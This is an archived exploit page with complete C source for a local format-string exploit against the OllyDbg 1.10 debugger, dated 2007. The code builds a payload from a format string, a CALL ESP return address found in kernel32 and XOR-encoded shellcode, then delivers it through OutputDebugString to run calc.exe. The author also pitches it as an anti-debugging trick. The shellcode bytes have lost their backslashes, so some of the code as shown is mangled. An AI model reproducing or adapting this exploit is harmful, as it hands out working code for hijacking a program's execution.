OllyDbg 1.10 Local Format String Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : OllyDbg 1.10 Local Format String Exploit
# Published : 2007-04-17
# Author : jamikazu
# Previous Title : XnView 1.90.3 (.XPM File) Local Buffer Overflow Exploit
# Next Title : ProFTPD 1.3.0/1.3.0a (mod_ctrls) Local Overflow Exploit (exec-shield)
/*

..::[ jamikazu presents ]::..

OllyDbg v110 Local Format String Exploit (0day)

Author: jamikazu
Mail: jamikazu@gmail.com
web: http://jamikazu.110mb.com/

Bug discovered by Ned from (http://felinemenace.org/)

Credit: ap0x,milw0rm

Greets: All turkish security researchers ...

invokes calc.exe if successful

You can use it for your AntiCrack tricks against vuln OllyDbg

*/


#define NO_WIN32_LEAN_AND_MEAN
#include <windows.h>
#include <stdio.h>

#define FORMAT_STRING       "%4602u"
#define XOR_DWORD           0x02020202

#ifdef __BORLANDC__
#   pragma option -w-asc
#   pragma option -w-eff
#else
#pragma comment(linker,"/ENTRY:WinMain") 
#pragma comment(lib, "msvcrt.lib") 
#endif


// shellcode xored with 0x02 ,Size : 239 by jamikazu
// First gives message than invokes calc.exe
// You can put max 256-sizeof(FORMAT_STRING)-sizeof(DWORD)/*ret*/ bytes of shellcode
// because of bounds check on user-supplied data ,see below
// char buffer[256];
// snprintf(buffer,256,user_buffer);
// buffer[255]= '';
char shellcode[] =
	"xEBx0Fx58x80x30x02x40x81x38x4Fx4Cx4Cx41x75xF4xEBx05"
	"xE8xECxFFxFFxFFx57x89xEEx81xEEx0ExEAx02x02x02x02x5A"
	"x2Fx91x15x42x02x8Bx47xF6x68x42x07x48x1Ax42x02x52x89"
	"x47xF6x07xD7x15x42x02x52x68x02xBAx01x01x01x01xFDxD2"
	"x68x07x89x47xF6x07x50x1Ax42x02x52xBAx07x07x07x07xFD"
	"xD2x68x02xBAx06x06x06x06xFDxD2x89xE7x5FxC1x43x76x76"
	"x63x61x69x22x6Bx71x22x71x77x61x61x67x71x71x64x77x6E"
	"x23x08x08x55x67x22x63x70x67x22x6Bx6Cx22x76x6Ax67x22"
	"x72x70x6Dx61x67x71x71x22x61x6Dx6Cx76x67x7Ax76x22x6D"
	"x64x22x4Dx6Ex6Ex7Bx46x60x65x2Cx67x7Ax67x08x6Cx6Dx75"
	"x22x75x67x22x75x6Bx6Ex6Ex22x6Ex63x77x6Cx61x6Ax22x61"
	"x63x6Ex61x2Cx67x7Ax67x22x2Ax75x6Bx6Cx66x6Dx75x71x22"
	"x61x63x6Ex61x77x6Ex63x76x6Dx70x2Bx02x4Dx6Ex6Ex7Bx46"
	"x60x65x02x61x63x6Ex61x02x61x63x6Ex61x02x4Fx4Cx4Cx41";

DWORD SearchStream(
    const char *pvStream,
    size_t uStreamSize,
    const char *pvSubStream,
    size_t uSubStreamSize
)
{
    unsigned int uCount = 0,i,j;

    while( (uStreamSize) > (uCount) ) {
        for(i=0;i<=(uSubStreamSize-1);i++) {
            if(*pvStream != pvSubStream[i]) {
                *pvStream++;
                if( i>0 ) {
                    for(j=0;j<i;j++)
                        *pvStream--;
                }
                break;
            }
            if( i == (uSubStreamSize-1) )
                return (uCount);
            *pvStream++;
        }
        uCount++;
    }

    return -1;
}

DWORD FindRetToEspAddress(VOID)
{
    HMODULE hModule = GetModuleHandle("kernel32.dll");
    DWORD dwEspRet;
    char* pszCallEsp = "xFFxD4"; // CALL ESP
    //char* pszJmpEsp  = "xFFxE4"; // JMP ESP

    PIMAGE_DOS_HEADER pimage_dos_header;
    PIMAGE_NT_HEADERS pimage_nt_headers;

    pimage_dos_header = (PIMAGE_DOS_HEADER)hModule;
    pimage_nt_headers = (PIMAGE_NT_HEADERS)((DWORD)hModule+pimage_dos_header->e_lfanew);

    dwEspRet = SearchStream((char*)hModule,pimage_nt_headers->OptionalHeader.SizeOfImage,pszCallEsp,sizeof(WORD));

    return (dwEspRet += (DWORD)hModule);
}

int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
{
    char* pszEvilBuffer;
    ULONG ulEvilBufSize;

    DWORD dw_MessageBoxA    = (DWORD)GetProcAddress(LoadLibrary("user32.dll"),"MessageBoxA")^XOR_DWORD;
    DWORD dw_WinExec        = (DWORD)GetProcAddress(GetModuleHandle("kernel32.dll"),"WinExec")^XOR_DWORD;
    DWORD dw_ExitProcess    = (DWORD)GetProcAddress(GetModuleHandle("kernel32.dll"),"ExitProcess")^XOR_DWORD;

    DWORD dwRetAddr = FindRetToEspAddress();

    int i = 0;

    memcpy(shellcode+0x3E,&dw_MessageBoxA,sizeof(DWORD));
    memcpy(shellcode+0x50,&dw_WinExec,sizeof(DWORD));
    memcpy(shellcode+0x59,&dw_ExitProcess,sizeof(DWORD));

    ulEvilBufSize = sizeof(FORMAT_STRING) + sizeof(dwRetAddr) + sizeof(shellcode);

    pszEvilBuffer = (char*)malloc(ulEvilBufSize);
    memset(pszEvilBuffer,0x90,ulEvilBufSize);

    memcpy(pszEvilBuffer+i, FORMAT_STRING, sizeof(FORMAT_STRING)-1); i += sizeof(FORMAT_STRING)-1;
    memcpy(pszEvilBuffer+i, &dwRetAddr,          sizeof(dwRetAddr)); i += sizeof(dwRetAddr);
    memcpy(pszEvilBuffer+i, shellcode,         sizeof(shellcode)-1); i += sizeof(shellcode)-1;

    // Final =)
    OutputDebugString(pszEvilBuffer);

    free(pszEvilBuffer);
    return 0;
}

# www.Syue.com [2007-04-17]